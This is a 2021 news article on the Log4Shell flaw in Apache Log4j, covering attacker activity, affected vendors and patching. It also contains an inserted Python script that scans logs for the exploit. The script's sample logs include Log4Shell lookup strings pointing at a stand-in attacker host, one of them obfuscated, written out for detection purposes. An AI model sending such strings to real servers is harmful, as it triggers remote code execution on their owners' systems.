Security | 13.12.2021

Critical security flaw being exploited all over the Internet

IT security company Sophos has detected a sharp increase in attacks exploiting a zero-day vulnerability in Apache’s Log4j logging library.

Vulnerable organisations include Apple, Tencent, Valve, Google, Minecraft, Amazon, and Tesla, to name a few.

The exploit, dubbed Log4Shell and tracked as CVE-2021-44228, was initially detected by LunaSec on 9 December 2021. It allows an attacker to inject log messages or message parameters into server logs that cause the server to load code from a remote server.

The affected server will then run that code via calls to the Java Naming and Directory Interface (JNDI).

Sophos also expects malicious actors to intensify and diversify their attack methods and possibly introduce malware in the near future.

“Since Dec. 9, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability,” said Sophos senior threat researcher Sean Gallagher.

Sophos found that crypto mining botnets are some of the earliest to exploit the vulnerability. They tend to focus on Linux server platforms that are vulnerable to the exploit.

“Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability,” Gallagher said.

“This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet.”

The IT security company’s investigations also revealed attempts to retrieve information from services such as account information for Amazon Web Services and other private data.

“The most recent intelligence suggests attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts,” Gallagher said.

“There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks.”

According to Sophos, exploitation attempts begin by probing for different types of network service, with around 90% of probes focused on the Lightweight Directory Access Protocol (LDAP).

One researcher demonstrated how the exploit could be used to attack a vulnerability in Apple’s servers and promptly informed the company of the issue.

Based on follow-up reports, Apple patched the vulnerability within hours.

Cloudflare CEO Matthew Prince said that the company found evidence suggesting that the Log4j exploit was used in the wild as early as 1 December.

“That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure,” Prince stated.

According to a report from ArsTechnica, Log4Shell was first identified through sites catering to Minecraft players.

The sites displayed messages warning that hackers could execute malicious code on servers or clients running Minecraft’s Java platform by manipulating log messages.

Log4j forms part of many popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.

That means that significant numbers of third-party apps could also be vulnerable to exploits of the same high severity as those threatening Minecraft users.

How the Log4j exploit works

Gallagher outlined the severity of the Log4Shell vulnerability.

“The Log4Shell vulnerability presents a different kind of challenge for defenders,” Gallagher said.

“Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it.”

“However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organisation’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security,” he added.

According to ArsTechnica, Log4j will interpret a specially crafted log message as a URL, fetch it, and even execute any executable payload it contains with the full privileges of the host program.

Exploits are triggered by text using the ${} lookup syntax, which allows them to be embedded in browser user agents or other commonly logged attributes.
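Because the trigger is plain text in a commonly logged field, defenders can look for it in their own logs. The following is an added example, not code from the article, Sophos or the Log4j project: it scans constructed web-server access-log lines for the ${jndi:...} lookup syntax described above (including percent-encoded and nested forms), and pulls out the callback host for blocklisting and triage. The sample log lines, hostnames and function names are all assumptions made for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not from the article). The User-Agent
# field, which Log4j-based applications commonly log, carries the lookup string.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2021:10:01:02 +0200] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [13/Dec/2021:10:01:09 +0200] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [13/Dec/2021:10:02:44 +0200] "GET /login HTTP/1.1" 200 1024 "-" "${${lower:j}ndi:ldap://attacker.example/b}"
203.0.113.11 - - [13/Dec/2021:10:03:10 +0200] "GET /api HTTP/1.1" 200 88 "-" "curl/7.79.1"
"""

# A plain ${jndi:...} lookup, case-insensitive, tolerating stray whitespace.
JNDI_DIRECT = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Any lookup that contains another lookup before it closes. Legitimate log
# input almost never nests ${...}, so this flags rewritten variants without
# having to enumerate them.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")
# Scheme and host of the callback URL, for blocklisting and follow-up triage.
CALLBACK = re.compile(r"\b(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/:}\s\"]+)", re.IGNORECASE)


def classify_line(line: str) -> Optional[str]:
    """Return a verdict for one log line, or None if nothing suspicious."""
    text = unquote(line)  # the lookup may arrive percent-encoded in a URL path
    if JNDI_DIRECT.search(text):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(text):
        return "nested-lookup"
    return None


def extract_callback_host(line: str) -> Optional[str]:
    """Host the lookup would contact, if a URL is visible in the line."""
    m = CALLBACK.search(unquote(line))
    return m.group(2) if m else None


def scan_log(text: str) -> List[Tuple[int, str, Optional[str]]]:
    """Scan a log and return (line number, verdict, callback host) per hit."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        verdict = classify_line(line)
        if verdict is not None:
            hits.append((number, verdict, extract_callback_host(line)))
    return hits


if __name__ == "__main__":
    for number, verdict, host in scan_log(SAMPLE_LOG):
        print(f"line {number}: {verdict} -> callback host {host}")
```

A hit tells you which request to investigate and which outbound host to block; whether the lookup actually fired still depends on the Log4j version and configuration of the application that logged it.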

Gallagher further emphasised the need for Apache Log4j users to update and monitor their network activity.

“Once an attacker has secured access to a network, then any infection can follow,” he said.

“Therefore, alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.”
